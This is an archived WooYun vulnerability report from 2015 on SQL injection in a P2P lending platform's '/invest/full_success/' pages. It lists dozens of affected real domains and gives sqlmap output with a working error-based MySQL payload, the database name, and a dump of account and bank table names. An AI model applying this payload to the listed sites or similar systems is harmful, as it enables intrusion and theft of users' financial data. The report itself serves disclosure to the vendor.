乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-13: 细节已通知厂商并且等待厂商处理中 2015-08-15: 厂商已经确认,细节仅向厂商公开 2015-08-18: 细节向第三方安全合作伙伴开放 2015-10-09: 细节向核心白帽子及相关领域专家公开 2015-10-19: 细节向普通白帽子公开 2015-10-29: 细节向实习白帽子公开 2015-11-13: 细节向公众公开
上一个注入漏洞修复,又找出一个注入漏洞
影响网站
http://www.kkkdai.com/invest/full_success/a20150600001.htmlhttp://shunchangcaifu.com/invest/full_success/a20150600004.htmlhttp://wenbangjinrong.com/invest/full_success/a20150500023.htmlhttp://www.zhuoxincf.com/invest/full_success/a20150400033.htmlhttp://www.lurongdai.com/invest/full_success/a20150800007.htmlhttp://www.hengdacaifu.com/invest/full_success/a20150800031.htmlhttp://wangdai168.com/invest/full_success/a20150800009.htmlhttp://www.xuefudai.com/invest/full_success/a20150800007.html其他受影响域名http://www.mingfucaifu.comhttp://www.donglingdai.comhttp://www.zndai.comhttp://www.qduoduo.nethttp://www.xsbvc.comhttp://www.mingyedai.comhttp://yolo100.nethttp://www.btzhd.comhttp://ludongchuangtou.comhttp://xinruncaifu.comhttp://chengyuecaifu.comhttp://leyuancaifu.comhttp://zhuoxincf.comhttp://www.hengdacaifu.comhttp://fuhuajinrong.comhttp://donglingdai.comhttp://bccht.comhttp://qinghuacaifu.comhttp://zhengdaguquan.comhttp://sdxpct.comhttp://miaomiaocaifu.comhttp://www.hongshuncaifu.comhttp://longmaocaifu.comhttp://www.91toufang.comhttp://www.yikuaict.comhttp://www.jufuyidai.comhttp://haohaochuangtou.comhttp://www.153mh.com部分用户不是金钱柜用户
sqlmap identified the following injection points with a total of 70 HTTP(s) requests:---Place: URIParameter: #1* Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: http://shenghaodai.com:80/invest/full_success/a20150800024 AND (SELECT 5926 FROM(SELECT COUNT(*),CONCAT(0x716e6c6a71,(SELECT (CASE WHEN (5926=5926) THEN 1 ELSE 0 END)),0x7173656971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a).html---web server operating system: Linux Ubuntuweb application technology: PHP 5.3.10back-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: URIParameter: #1* Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: http://shenghaodai.com:80/invest/full_success/a20150800024 AND (SELECT 5926 FROM(SELECT COUNT(*),CONCAT(0x716e6c6a71,(SELECT (CASE WHEN (5926=5926) THEN 1 ELSE 0 END)),0x7173656971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a).html---web server operating system: Linux Ubuntuweb application technology: PHP 5.3.10back-end DBMS: MySQL 5.0current database: 'new_jqg2'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: URIParameter: #1* Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: http://shenghaodai.com:80/invest/full_success/a20150800024 AND (SELECT 5926 FROM(SELECT COUNT(*),CONCAT(0x716e6c6a71,(SELECT (CASE WHEN (5926=5926) THEN 1 ELSE 0 END)),0x7173656971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a).html---web server operating system: Linux Ubuntuweb application technology: PHP 5.3.10back-end DBMS: MySQL 5.0Database: new_jqg2[75 tables]+---------------------------------+| jqg_account || jqg_account_balance || jqg_account_bank || jqg_account_cash || jqg_account_log || jqg_account_payment || jqg_account_recharge || jqg_account_users || jqg_account_users_bank || jqg_account_web || jqg_amount_type || jqg_approve || jqg_approve_edu || jqg_approve_edu_id5 || jqg_approve_flow || jqg_approve_id5 || jqg_approve_invite || jqg_approve_realname || jqg_approve_sms || jqg_approve_smslog || jqg_approve_video || jqg_areas || jqg_article_fields || jqg_articles || jqg_articles_fields || jqg_articles_pages || jqg_articles_type || jqg_attestations || jqg_attestations_type || jqg_attestations_user || jqg_borrow || jqg_borrow_amount || jqg_borrow_amount_apply || jqg_borrow_amount_log || jqg_borrow_amount_type || jqg_borrow_auto || jqg_borrow_autolog || jqg_borrow_change || jqg_borrow_count || jqg_borrow_count_log || jqg_borrow_credit || jqg_borrow_line || jqg_borrow_otherloan || jqg_borrow_recover || jqg_borrow_repay || jqg_borrow_shenqing || jqg_borrow_tender || jqg_borrow_tender_auto || jqg_borrow_tender_autolog || jqg_borrow_tender_web || jqg_borrow_vouch || jqg_borrow_vouch_recover || jqg_borrow_vouch_repay || jqg_comment || jqg_comments || jqg_common_admincp_cmenu || jqg_common_admincp_group || jqg_common_admincp_member || jqg_common_admincp_perm || jqg_common_admincp_session || jqg_common_admingroup || jqg_common_adminnote || jqg_common_advertisement || jqg_common_advertisement_custom || jqg_common_banned || jqg_common_block || jqg_common_block_favorite || jqg_common_block_item || jqg_common_block_item_data || jqg_common_block_permission || jqg_common_block_pic || jqg_common_block_style || jqg_common_block_xml || jqg_common_cache || jqg_common_card |+---------------------------------+中间出错,390多张表,只出来这些,其他换ip可以继续搞,只为证明,不深入
危害等级:高
漏洞Rank:20
确认时间:2015-08-15 12:54
感谢对我们的支持。谢谢!
暂无